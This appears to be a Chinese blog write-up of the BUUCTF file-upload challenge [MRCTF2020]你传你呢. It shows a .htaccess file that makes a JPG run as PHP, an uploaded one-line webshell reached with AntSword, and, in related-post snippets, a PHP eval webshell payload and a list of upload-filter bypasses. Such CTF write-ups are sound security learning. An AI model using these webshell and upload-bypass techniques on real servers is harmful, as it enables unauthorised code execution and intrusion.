web:[MRCTF2020]你传你呢

已于 2023-10-11 22:43:36 修改
阅读量571 收藏
点赞数
分类专栏: BUUCTF-WEB 文章标签: 前端 网络安全 web安全
于 2023-10-10 23:11:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/133719304
版权

题目

点进页面显示如下

上传文件,先随便上传一个文件看看情况

构造含有一句话木马的图片上传

访问显示错误

这里参考了大佬的wp,上传一个.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行

.htaccess文件的内容为

<FilesMatch "2222.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这里用bp抓包修改类型

上传成功

访问

http://89577a55-c3b7-4c47-a9ef-4cafc3fd5fb4.node4.buuoj.cn:81/upload/f219c4e7db2f533060f7d3e3a21ed39b/2222.jpg

回显一片空白,说明木马上传成功

使用蚁剑链接

在根目录找到flag

得到flag

参考文章链接:

https://www.cnblogs.com/Jinx8823/p/16476006.html

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)_[mrctf2020]你传你 呢 1-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
2020web:网上购物
03-22
2020年网络课程
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 3549
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 8886
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
【BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5087
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]你你呢
m0_62905261的博客
09-07 434
[MRCTF2020]你你🐎呢
idea2020.1.3 手把手教你创建web项目的方法步骤
08-18
主要介绍了idea 2020.1.3 手把手教你创建web项目的方法步骤,文中通过图文介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
port_frontend:2020年Web开发人员组合
02-13
我的现代Web开发人员投资组合(开发)
soramori2020:UDC2020灾难响应项目Web应用程序
05-26
soramori2020
TechWeb2020:Unibo Web技术项目2020
02-15
TechWeb2020项目
BUUCTF | [MRCTF2020]你你呢
swordlb的博客
08-25 115
https://www.cnblogs.com/SpouseLJ/p/14967955.html
buuctf-[MRCTF2020]你你呢(小宇特详解)
小宇的web博客
01-26 1319
buuctf-[MRCTF2020]你你????呢(小宇特详解) 这里先试着修改后缀进行黑名单绕过,然而不行 这里的正确方法是进行.htaccess绕过 这里先上一个.htaccess文件 <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 注意:这里上.htaccess文件的时候一定要抓包将content-type的值修改为image/png 然后上一个1.png <?php
当使用dbeaver导出多个sql文件,怎么快速的把它合并成一个文件,可以针对多种不同的类型
热门推荐
熊浪的博客
09-19 1万+
1、不知道大家发现没有,当你复制一个同名的文件进入一个存在此名的文件夹下面的时候,计算机会提醒你三种选择,合并,覆盖,保留。   2、而不管是windows还是linux都是支持复制功能命令的,一个是Copy ,一个是cp 且都支持同时复制多个文件,而且后面会加上一个新文件的名称。   3、所以就像我导出来的121个sql文件就可以使用Copy *.sql 初始化数据.sql,这样所有的数据就
BUUCTF Web [MRCTF2020]你你呢1 & [极客大挑战 2019]HardSQL1
网安小趴菜
09-07 687
BUUCTF Web [MRCTF2020]你你🐎呢1 & [极客大挑战 2019]HardSQL1
Buuctf:[MRCTF2020]你你呢
fcz___的博客
03-11 240
然后你会发现无论你怎么改后缀,怎么改语法,就是无法链接蚁剑。我们就得尝试用.user.iniwen文件或者.htaccess文件把我们入的php代码执行了。我们也不知道网站目录上有没有php文件所以我们尝试用.htaccess文件。好的,可以看到文件路径为/upload/17f10253549cad63de6355a3b577ad74/a.png。我们打开蚁剑,添加数据。然后我们上我们的一句话木马文件a.png。我们先上一个图片试试。然后改文名件改为a.png`然后上。我们上.htaccess。
web:搭建你的第一个Web服务器
最新发布
03-21
要搭建你的第一个Web服务器,你可以按照以下步骤进行操作: 1. 选择合适的服务器软件:常见的Web服务器软件有Apache、Nginx、IIS等。你可以根据自己的需求和操作系统选择合适的软件。 2. 安装服务器软件:根据选择...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值